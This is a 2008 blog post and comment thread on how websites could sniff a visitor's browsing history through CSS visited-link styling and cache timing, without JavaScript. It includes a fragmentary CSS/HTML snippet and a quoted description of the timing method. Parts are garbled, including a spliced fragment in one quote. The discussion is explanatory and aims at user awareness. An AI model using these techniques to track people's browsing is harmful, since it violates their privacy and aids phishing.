Skip to content

There Is No Privacy #1: Snooping Browsing History through HTML

Unless you have installed a couple of specific firefox extensions to protect yourself, the owners of any website you visit can tell whether you have visited any other website.

It has been known since 2006 that is it possible for any website to query whether you have visited any of a list of other websites without even having to use javascript. One way to do this is to rely on the fact that CSS (that language for HTML style sheets used by virtually every website) allows website hosts to specific a different color or background image for a given link depending on whether that link has been visited before. By specifying a url on the snooping host as the background of a visiting link, a snooping website can determine whether you have visited any given link, as demonstrated by this code snippet from the above page:

    <style type="text/css">
         background: url;

    <a id="foo" href=""></a>

To watch this attack in action, click on the ‘View all sites of interest’ link on the right hand side of this page by Markus Jakobsson, Tom N. Jagatic, and Sid Stamm at the University of Indiana. The authors of the page specifically suggest that this sort of attack could be used by phishers to figure out which bank to emulate to fool a user into logging into a fake bank page, but there are any number of different ways to use this information. Felten and Schneider have written about a similar attack using cache timing that similarly gives access to a user’s browsing history.

Neither the link background and caching timing attacks rely on javascript, the source of a large number of privacy attacks. This freedom from javascript makes the attacks particularly effective, since one common (though highly invconcenient) method of securing a browser is to turn off javascript support. Even those who choose to turn off javascript are not safe from these attacks. There are firefox extensions to protect against both attacks, but they are not widely used. The developers of the core firefox browser have chosen not to include the code in those extensions in the base browser even though the attack has been well known among security geeks for a couple of years, with the result that the vast majority of users remain vulnerable to the attack. The end result is that, unless you use firefox and install the above extensions or periodically purge your browser history, any website you visit can tell whether you have visited any other website.

Update: The above extensions evidently don’t even work with firefox 3.0, though firefox 3.1 is reported to have a non-ui-accessible configuration setting that will block the visited link color by turning off the visited link feature altogether.

{ 6 } Comments

  1. Hugh McNally | November 21, 2008 at 2:15 pm | Permalink

    Actually, to watch this attack in action, you need to visit…

    …and allow the server-side component to do the analysis in question. The alarmism of this post is understandable; it should be tempered by the fact that the phisher needs to generate a specific list of URLs and run the exploit against that list, thus coming up with a subset of his source list. The source list would be easy enough to generate, though.

    > Neither the link background and caching timing attacks rely on javascript

    This is wrong. To illustrate, visit the above URL with JS turned off; it will tell you to turn it on to get phishing results. This exploit examines how long it takes to retrieve a style sheet; if the time is negligible, the phisher can assume that the browser client has that information cached and, therefore, can assume that the user has visited site X. The measurement of time on the client side requires a client-side technology (the JS code).

    The complete description of the exploit is described in some detail by the University of Illinois researchers at In it, they relate how researchers have “described a timing-based attack that made it possible to determine (with some statistically quantifiable certainty) whether a given user had visited a given site or not – simply by determining the retrieval times of consecutive URL calls in a segment of HTTP code.”

    This blog posting should be revised to reflect the facts of the exploit. No doubt, the author visited the “result link” on ( that had been sent to him/her, saw the results, said “hey, I’ve visited these sites!” and wrote this post. I did the same, and briefly thought the same.

  2. hal | November 21, 2008 at 3:20 pm | Permalink

    Hi Hugh,

    Thanks for the comments and the fixed link for the demonstration. I hadn’t realized they were generating session specific links for that demo. I think you may be thinking of the bank widget demonstration on the main page of the indiana site. The more interesting demo that I was trying (and failing!) to link to is the one linked by the ‘view all sites of interest’ link under the banking widget.

    I state clearly in the post that the attacks make it “possible for any website to query whether you have visited any of a list of other websites.” I’m not sure how to state any more clearly that the exploit has to run against a list of sites.

    The alarmism in the post is intentional, though the ‘#1’ part of the title is supposed to hint that there will be more posts in the future that argue that the lack of privacy is composed a number of these sorts of privacy invasions. In fact, a large majority of web users have no idea and would be alarmed to learn that any given site they visit can tell whether or not they have visited youporn, alcoholics anonymous, or a gambling site. And this is just one of many of these sorts of holes in expected privacy that are just sitting around with either no apparent solution or no one with the power interested in fixing them.

    There are versions of both attacks that work with javascript, but there are also versions of both that work without javascript.

    Which part of the visited link attach html included in the post requires javascript? In fact, if you turn off javascript and click on the ‘view all sites of interest’ link on the right of the page, you’ll see that they still have the list of sites you’ve visited. They just happened to be using javascript to display the baking widget on the first page. The html version of the attack itself just relies on loading the background images for the visited links and logging the resulting hits on the server hosting the images.

    Likewise, if you read the paper by Felten and Schneider you’ll see that they talk about how to perform the attack without javascript:

    Java and JavaScript provide the most accurate means of measuring access time, but the attacker can get a sufficiently accurate measurement even if Java and JavaScript are disabled. This is done by writing a Web page that loads three files in sequence:

    1. a dummy file on the attacker’s site,
    2. the file whose access time is to be measured, and
    3. another dummy file on the attacker’s site.

    The attacker’s Web server can record the time at which it receives requests 1 and 3; subtracting yields an approximation to the time required to perform step 2. (We omit the straightforward but tedious details of how to write HTML that causes popular browsers to make serialized accesses to files.)victim read the email message. The message could be disguised as an unwanted “spam” message, so that the victim did not notice anything unusual.

  3. Hugh McNally | November 21, 2008 at 3:57 pm | Permalink

    Thank you for including more technical details in your reply. I think you’ll agree that the mere existence of the code snippet at the top of the original post wouldn’t do much of anything unless the time it took to load those assets was measured by some mechanism.

    I indeed was referring to the very same proof of concept page you cited (or wanted to cite). Believe me, I’m with you in wanting to flush out the bad guys and their evil ways; your original post didn’t really address the “how” part of that. I was unaware of this type of exploit before I read this post.

    I acknowledge the server side possibility of this exploit (thanks for expanding my mind), but it seems like it would be noticeable to the end user (probably using a META REFRESH of the page). This could no doubt be crafted to look normal to an average website user, though. My gut feeling is, though, that the U of I proof of concept page uses JS for both the “illustrative example” and the link-through beneath it to the “big list.”

    Do you know of a proof of concept page for the server-side version of this exploit? I’d like to try it out!

  4. hal | November 21, 2008 at 4:02 pm | Permalink

    The attack doesn’t require a meta refresh — the second page is just for displaying the results. The server gets the data after the first page is loaded.

    The U of I page is a proof of concept of the non-javascript version of the attack. There’s no gut feeling involved — look at the source for the page and you’ll see exactly one line of lonely javascript loading the bank icon. One of the shocking parts about this attack is how trivially easy it is.

    Try this:

    * turn off javascript in your browser
    * load the u of i page
    * click on the ‘view all sites of interest’ link

    You’ll see the list of sites you’ve visited in its full glory, without any javascript.

  5. Hugh McNally | November 21, 2008 at 5:07 pm | Permalink

    The visit to the proof of concept page is building the next page and then linking to it, which would explain the unique key at the end of the URL. Appears to be done in an invisible IFRAME. I hate it when technology is used for evil.

    Just for fun…

    This looks like the attack, and it does have a 5 second META REFRESH based delay in it (which you never see, since it’s in an invisible frame). You can run it solo for even more fun…

    First the timing analysis, then a status report with some JavaScript to populate the “banking scheme” square of the first proof of concept page.

    Well, even if my technical analysis is still a little off, this has been an interesting and educational experience. The underlying theme is “crap that happens without the user’s consent or knowledge.” Maybe the next thing to start being cranky about with web client software developers is invisible frames…

  6. webthoughts | December 4, 2008 at 4:05 pm | Permalink

    For most sites visited I don’t care about privacy.

    But some time i do.

    Obviously banking and e-stores have issues with steeling credit card data and personal account info.

    Other sites have privacy concerns such as adult content and this type of personal preferences that most people would want not to be public.

    But for most of us “Joe average” no big deal outside of our sphere of contacts.

    My concern is with institutions and black (invisible) market forces.

    The fact that skilled hacks are all over, from the 13 year old next door. (Or in the next room!) to the high end cyber-criminals. They can elude most all but the best security teams because of the sheer numbers. They can enter most any computer system and never be caught.The best that is expected is that the security gets updated on that site. But in even the best case the intruder has more than one way back in and can at will.

    The fact is there is not an endless amount of money and personel to reletnlessly scrutinize each and every breach.

    So no one is caught almost ever.

    This leads to a sense of invincible-ness of those that are doing these things.

    Imagine if rape was not enforced and it was common knowledge, do you think this crime would skyrocket or just go up a little?

    Why not a more secure sub-space that does not allow the open do-anything that the mind can imagine HTML,XML,j-script world to run on both the servers and the client side?

    have code that forbids “invisible frames” and the like on both the client and host for secure environments.

    Auto logging of anamolies on the host side, law enforcement involvement parallel with the host IT staff to close the technologies holes as well as the time delay to determine the perpetrators. Make a law that corperations must disclose breaches to law enforcement in real time.
    Do not leave this to “Management” to decide and integrate the damage control and hassle overhead cost…this is how we got her. Delay breads criminals through the percieved or real perception of invinsibility.

    Look how long it takes to catvh mass spammers, they are not exactly in stealth mode.

    Hold those people accountable financially.

    Hold spammers accountable for the electrical costs imposed by ISP’s and server farms alone would kill the spam biz model, let alone the lost time of IT folks playng the chess game with these people, or the end user and their wasted time and frustration.

    Ther is no way to make these people pay the total cost of lost productivity, time and trouble.

    Imagine if both those doing the spam to black market, the IT stakk time and cost and the end user lost time and lost oportunity focused on things that have value to society. How much better off would we be?

    Could this alone have produced enough wealth and taxes alone to have paid off the national debt?

    I bet it would if this cancer had never started.

    Fast response to catching this stuff is key to reversing this total waste of human value.
    when people think they can get away with it they will continue to do it.
    Yes this will take a massive infusion of resources, but it will have a huge pay off when it is crushed.

    There is a whole eco system of internet cancer that is systemic. each one involved thinks they are not that bad and only doing something “grey at the fringes”and fail to relise they are a key part of the E-cancer.